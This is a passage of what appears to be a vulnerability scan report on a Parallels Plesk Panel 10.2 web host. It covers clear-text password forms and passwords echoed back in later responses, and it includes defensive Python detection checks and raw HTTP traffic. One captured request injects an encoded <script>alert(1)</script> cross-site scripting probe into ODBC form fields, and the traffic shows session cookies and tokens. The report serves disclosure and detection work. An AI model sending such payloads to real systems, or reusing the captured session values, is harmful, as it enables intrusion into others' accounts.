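    def handle_starttag(self, tag, attrs):
        a = dict(attrs)      # valueless attributes arrive as None
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password_fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # <input> without a type attribute is a text input
            if (a.get("type") or "text").lower() == "password":
                self._current["password_fields"].append(a.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_url, html):
    """Return [(resolved_action_url, [password field names]), ...] for each form
    that contains a password input and whose effective action is http://.

    The action is resolved like a browser does: relative actions resolve
    against the page URL, and an empty or missing action posts back to the
    page URL itself. So a page served over http:// with action="" is flagged,
    and a page served over https:// is flagged only if the action is an
    absolute http:// URL.
    """
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password_fields"]:
            continue
        action = urljoin(page_url, form["action"])
        if urlsplit(action).scheme.lower() == "http":
            findings.append((action, form["password_fields"]))
    return findings


# Constructed sample: the form from the /smb/web/edit response, trimmed to its inputs.
SAMPLE_URL = "http://www.nosedivesailing.com:8880/smb/web/edit"
SAMPLE_HTML = """
<form id="form-nal-web-edit" enctype="application/x-www-form-urlencoded" action="" method="post">
<input type="text" name="userAccount[login]" id="userAccount-login" value="xsscx" autocomplete="off" maxlength="16" class="input-text" />
<input type="password" name="userAccount[password]" id="userAccount-password" value="" autocomplete="off" class="input-text" />
<input type="password" name="userAccount[confirmPassword]" id="userAccount-confirmPassword" value="" autocomplete="off" class="input-text" />
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be" id="form_forgery_protection_token" /></form>
"""

if __name__ == "__main__":
    for action, fields in cleartext_password_forms(SAMPLE_URL, SAMPLE_HTML):
        print(f"clear-text password form: {action} fields={fields}")
```

Run against the sample, the check reports the single form with both password fields because the page itself was fetched over http://; fed the same HTML with an https:// page URL it reports nothing, which is the point of resolving the action rather than reading the attribute literally.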

Request

GET /smb/web/edit HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: advancedPanel-hidden=0; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:16:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:16:53 GMT
Connection: close
Content-Length: 26000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Web Hosting Settings - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fedit' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/web/index">
<span>Up Level</span>
</a>
</div>
<h2><span>Web Hosting Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<p>This is where you can view the IP addresses associated with your subscription and change the username and password for access to files and folders related to your subscription.</p>

<form id="form-nal-web-edit" enctype="application/x-www-form-urlencoded" action="" method="post">

<div id='ipAddress' class='form-box' >
<div id='ipAddress-content-area'>

<div class='form-row'>
<div class='field-name'><label for='ipAddress-currentIp'>IP Addresses&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='ipAddress-currentIp'>50.23.106.58</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'IP Addresses',
applyTo: 'ipAddress'
});
});
//]]>
</script>


<div id='userAccount' class='form-box' >
<div id='userAccount-content-area'>
<tr>
<td colspan='2'>
<p class="" escape="">System user account used for managing files and folders within the subscription.</p></td>
</tr>
<div id='userAccount-login-form-row' class='form-row' >
<div class='field-name'><label for='userAccount-login'>Username&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="userAccount[login]" id="userAccount-login" value="xsscx" autocomplete="off" maxlength="16" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='userAccount-password-form-row' class='form-row' >
<div class='field-name'><label for='userAccount-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="userAccount[password]" id="userAccount-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('userAccount-password');
new Jsw.PasswordMeter({
renderTo: 'userAccount-password',
renderMode: 'after',
observe: 'userAccount-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='userAccount-confirmPassword-form-row' class='form-row' >
<div class='field-name'><label for='userAccount-confirmPassword'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="userAccount[confirmPassword]" id="userAccount-confirmPassword" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='field-name'><label for='userAccount-shell'>Access to the server over Remote Desktop&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='userAccount-shell'>Login prohibited</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'User Account',
applyTo: 'userAccount'
});
});
//]]>
</script>


<div id='diskQuota' class='form-box' >
<div id='diskQuota-content-area'>
<tr>
<td colspan='2'>
<p class="" escape="">The hard quota on disk space is the limit on the amount of disk space that can be used. If the hard quota is set, and all allocated disk space is used, no further operations on files can be performed.</p></td>
</tr>

<div class='form-row'>
<div class='field-name'><label for='diskQuota-quota'>Hard quota on disk space&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='diskQuota-quota'>Unlimited</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Hard Quota on Disk Space',
applyTo: 'diskQuota'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/web"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-nal-web-edit',
waitButtonTitle: 'Please wait'
})
});
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

if ($('userAccount-restrictedShell')) {
var optionsElementsPrefix = 'userAccount-';
var optionsDefaults = { 'shell': $('userAccount-restrictedShell').value };
var optionsNames = Object.keys(optionsDefaults);
var insecureHostingOptionsElement = null;

var localeKeys = {"buttonConflictYes":"Yes","buttonConflictNo":"No","sureToApplyConflictOptionTitle":"Are you sure you want to apply this setting?","sureToApplyConflictOptionDescription":"This setting conflicts with the server-wide security policy.","foundConflictOptionsTitle":"There are settings that conflict with the server-wide security policy. Are you sure you want to continue?","foundConflictOptionsDescription":"If you really want to override the security policy and apply the conflicting settings, click Yes. Otherwise, click No, and then click the link 'apply secure setting preset' to bring the settings in accordance with the server-wide security policy. The following settings conflict with the policy:","option_ssl":"SSL support","option_php_safe_mode":"PHP 'safe_mode' on","option_perl":"Perl support","option_python":"Python support","option_miva":"Miva support","option_coldfusion":"Adobe ColdFusion support","option_write_modify":"Additional write\/modify permissions","option_php":"PHP support","option_cgi":"CGI support","option_fastcgi":"FastCGI support (required for Ruby on Rails)","option_ssi":"SSI support","option_asp_dot_net":"Microsoft ASP.NET support","option_asp":"Apache ASP support","option_errdocs":"Custom error documents","option_webstat":"Web statistics","option_shell":"System shell","option_php_handler":"PHP handler type","option_iis_app_pool":"Dedicated IIS application pool"};

function optionConflictWarning(element, defaultValue, resetHandler) {
Jsw.messageBox.show({
'type': Jsw.messageBox.TYPE_YESNO,
'subtype': 'confirm',
'text': localeKeys['sureToApplyConflictOptionTitle'],
'description': localeKeys['sureToApplyConflictOptionDescription'],
'onNoClick': function() {
if ('undefined' != typeof resetHandler) {
resetHandler();
} else {
if ('input' == element.tagName.toLowerCase() && 'checkbox' == element.type) {
// set inverted value and simulate the selection by click to fire event observers
element.checked = !defaultValue;
element.click();
} else if ('select' == element.tagName.toLowerCase()) {
element.value = defaultValue;
}
}
},
'buttonTitles': {
'yes': localeKeys['buttonConflictYes'],
'no': localeKeys['buttonConflictNo']
}
});
}

function checkShellOptionConflict(option, element, callback) {
var shellEnabledElement = $(optionsElementsPrefix + 'shellEnabled');
var shellEnabled = shellEnabledElement && shellEnabledElement.checked || !shellEnabledElement;

if (shellEnabled && element.value != '/bin/false' && element.value != 'Login Disabled') {
defaultValue = optionsDefaults[option];
callback(element, defaultValue, function() {
if ('off' == defaultValue || '' == defaultValue) {
if (shellEnabledElement) {
shellEnabledElement.checked = false;
$(optionsElementsPrefix + 'shell').disable();
} else {
// first value is "disable shell", so it's ok
defaultValue = element.options.first().value;
element.value = defaultValue;
}
} else {
element.value = defaultValue;
}
});
}
}

function checkOptionConflict(element, callback) {
var option = element.id.split('-').last().underscore();

if ('input' == element.tagName.toLowerCase() && 'checkbox' == element.type) {
if (!element.checked && ('1' == optionsDefaults[option] || 'on' == optionsDefaults[option])) {
callback(element, true);
} else if (element.checked && ('' == optionsDefaults[option] || 'off' == optionsDefaults[option])) {
callback(element, false);
}
} else if ('select' == element.tagName.toLowerCase()) {
if ('any' != optionsDefaults[option] && element.value != optionsDefaults[option]) {
if (option == 'shell') {
checkShellOptionConflict(option, element, callback);
} else {
callback(element, optionsDefaults[option]);
}
}
}
}

var optionsElements = [];

optionsNames.each(function(option) {
var element = $(optionsElementsPrefix + option.dasherize().camelize());

if (!element) {
if ('ssl' == option) {
element = $('sslSettings-ssl');
} else if ('write_modify' == option) {
element = $(optionsElementsPrefix + 'write_modify');
} else if ('iis_app_pool' == option) {
element = $('tabs-performanceTab-performanceSubForm-iis_app_pool');
}
}

if (!element) {
return ;
}

optionsElements.push(element);
});

optionsElements.each(function(element) {
var eventType = ('select' == element.tagName.toLowerCase()) ? 'change' : 'click';
element.observe(eventType, function(event) {
if (insecureHostingOptionsElement && insecureHostingOptionsElement.checked) {
return ;
}

checkOptionConflict(element, optionConflictWarning);
});
});

var shellEnabledElement = $(optionsElementsPrefix + 'shellEnabled');
var shellElement = $(optionsElementsPrefix + 'shell');
if (shellEnabledElement) {
shellEnabledElement.observe('click', function(event) {
if (insecureHostingOptionsElement && insecureHostingOptionsElement.checked) {
return;
}

if (shellEnabledElement.checked && ('' == optionsDefaults['shell'] || 'off' == optionsDefaults['shell'])) {
optionConflictWarning(shellEnabledElement, false, function() {
shellEnabledElement.checked = false;
shellElement.disable();
});
}
});
}

var formElement = $$('button[name="send"]').first().up('form');
var origSubmitHandler = formElement.submit;

formElement.submit = function() {
if ((insecureHostingOptionsElement && insecureHostingOptionsElement.checked)
|| ($(optionsElementsPrefix + 'hostingEnabled') && !$(optionsElementsPrefix + 'hostingEnabled').checked)
) {
return origSubmitHandler();
}

var conflictsFound = false;
var conflictOptionsHtml = '<ul class="ul">';

optionsElements.each(function(element) {
checkOptionConflict(element, function() {
var option = element.id.split('-').last().underscore();
conflictOptionsHtml += '<li>' + localeKeys['option_' + option] + '</li>';
conflictsFound = true;
});
});

conflictOptionsHtml += '</ul>';

if (!conflictsFound) {
return origSubmitHandler();
}

Jsw.messageBox.show({
'type': Jsw.messageBox.TYPE_YESNO,
'subtype': 'confirm',
'text': localeKeys['foundConflictOptionsTitle'],
'description': localeKeys['foundConflictOptionsDescription'] + conflictOptionsHtml,
'descriptionWrapperTag': 'div',
'onYesClick': function() {
origSubmitHandler();
},
'buttonTitles': {
'yes': localeKeys['buttonConflictYes'],
'no': localeKeys['buttonConflictNo']
}
});

return false;
}

function applySecureSettings() {
optionsElements.each(function(element) {
var option = element.id.split('-').last().underscore();

if ('shell' == option && ('' == optionsDefaults[option] || 'off' == optionsDefaults[option])) {
if ($(optionsElementsPrefix + 'shellEnabled')) {
$(optionsElementsPrefix + 'shellEnabled').checked = false;
$(optionsElementsPrefix + 'shell').disable();
}
} else if ('input' == element.tagName.toLowerCase() && 'checkbox' == element.type) {
if ('1' == optionsDefaults[option] || 'on' == optionsDefaults[option]) {
element.checked = true;
} else if ('' == optionsDefaults[option] || 'off' == optionsDefaults[option]) {
element.checked = false;
}

// invert the value and simulate the selection by click to fire event observers
element.checked = !element.checked;
element.click();
} else if ('select' == element.tagName.toLowerCase()) {
if ('any' != optionsDefaults[option]) {
element.value = optionsDefaults[option];
}
}
});
} }

});
//]]>
</script>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

4. Password returned in later response

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue description

Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.

Issue remediation

There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.
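As an added example (not code from the XSS.CX report or from Plesk), the two checks below implement what this finding describes in Python. password_echo_contexts looks for a password you submitted reappearing in a later response, raw or in its HTML-escaped and URL-encoded forms, and reports where it landed (the tag whose attribute holds it, inline script, or text). prefilled_password_inputs flags password inputs served with a non-empty value attribute and needs no knowledge of the secret, so it can run over every captured page. The sample response body and the secret Tr0ub4dor&3 are constructed for the example and are not taken from the report.

```python
"""Checks for a password that the application hands back in a later response.

Added example, not code from the XSS.CX report or from Plesk. The sample
response and the secret below are constructed for the demonstration.
"""
import html
import re
from urllib.parse import quote

_INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
_ATTR = re.compile(r'([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def _context_at(body, pos):
    """Where a match at `pos` sits: the name of the tag whose attribute area
    contains it, "script" for inline script content, otherwise "text"."""
    lt = body.rfind("<", 0, pos)
    gt = body.rfind(">", 0, pos)
    if lt > gt:  # an unclosed '<' precedes us: we are inside a tag
        m = re.match(r"<\s*/?\s*([A-Za-z][\w-]*)", body[lt:])
        if m:
            return m.group(1).lower()
    lower = body.lower()
    if lower.rfind("<script", 0, pos) > lower.rfind("</script", 0, pos):
        return "script"
    return "text"


def password_echo_contexts(secret, body):
    """Every reappearance of `secret` in `body` as (encoding, context).

    encoding is "raw", "html-escaped" or "url-encoded". An escaped echo still
    leaks the password to whoever can read the response; a raw echo of
    attacker-controlled input is in addition an injection sink.
    """
    variants = [
        ("raw", secret),
        ("html-escaped", html.escape(secret, quote=True)),
        ("url-encoded", quote(secret, safe="")),
    ]
    hits = []
    seen = set()
    for encoding, needle in variants:
        if needle in seen:
            continue  # escaping changed nothing for this secret; report once
        seen.add(needle)
        for m in re.finditer(re.escape(needle), body):
            hits.append((encoding, _context_at(body, m.start())))
    return hits


def prefilled_password_inputs(body):
    """Names of <input type="password"> elements served with a non-empty
    value attribute (the usual way a password comes back in a later page).
    Tag-level regex, so a '>' inside an attribute value would end the tag early."""
    names = []
    for tag in _INPUT_TAG.findall(body):
        attrs = {k.lower(): (v1 or v2 or v3) for k, v1, v2, v3 in _ATTR.findall(tag)}
        if attrs.get("type", "").lower() == "password" and attrs.get("value"):
            names.append(attrs.get("name", ""))
    return names


# Constructed sample: an ODBC settings page that re-renders the submitted
# password in the form and again inside inline script (neither value is
# taken from the report; the secret is made up for the example).
SAMPLE_SECRET = "Tr0ub4dor&3"
SAMPLE_BODY = (
    '<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post">'
    '<input type="text" name="UID" value="dsn_user">'
    '<input type="password" name="PWD" value="Tr0ub4dor&amp;3">'
    '<input type="password" name="confirm" value="">'
    "</form>"
    '<script>var dsn = {uid: "dsn_user", pwd: "Tr0ub4dor&3"};</script>'
)

if __name__ == "__main__":
    for encoding, ctx in password_echo_contexts(SAMPLE_SECRET, SAMPLE_BODY):
        print(f"secret echoed {encoding} inside <{ctx}>")
    print("password inputs with a value:", prefilled_password_inputs(SAMPLE_BODY))
```

On the sample the first check finds the secret twice, raw inside the script block and HTML-escaped inside the input tag, and the second reports only PWD, since the confirm field is served empty. The raw case is why the request above sends an encoded <script>alert(1)</script> payload in the UID and PWD fields: a field whose submitted value comes back unescaped is both a password leak and a cross-site scripting sink.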

Request 1

POST /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBAmLYTA3n6e9qKZE
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 1632

------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="DRIVER"

SQL Server
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="SERVER"

(local)
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="UID"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="PWD"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="DATABASE"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="APP"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="LANGUAGE"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="OEMTOANSI"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="cmd"

check
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="wizaction"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE--

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:10:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:10:17 GMT
Connection: close
Content-Length: 18522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
